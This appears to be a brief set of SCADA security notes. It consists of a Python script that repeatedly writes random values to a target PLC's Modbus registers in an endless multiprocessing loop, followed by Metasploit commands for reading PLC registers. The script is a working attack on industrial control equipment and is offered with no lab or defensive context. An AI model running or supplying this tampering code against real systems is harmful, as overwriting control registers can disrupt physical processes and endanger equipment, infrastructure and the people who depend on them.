SCADA Security Notes

Modbus write random registers

from pymodbus.client.sync import ModbusTcpClient
import multiprocessing
import random
from multiprocessing import TimeoutError

client = ModbusTcpClient('[target]')
client.connect()

def write(reg):
    client.write_register(reg+1, random.randint(1, 100))
    print('reg:' + str(reg))

if __name__ == '__main__':

    while True:
        p = multiprocessing.Pool(2)
        try:
            p.map(write, [x for x in range(20)])
        except TimeoutError:
            pass
        except Exception as e:
            print(e)
            exit()
    client.close()

Read and write data to a PLC with metasploit

use auxiliary/scanner/scada/modbusclient 
set DATA_ADDRESS 1
set RHOST [target]
set ACTION READ_REGISTERS
set NUMBER 19
run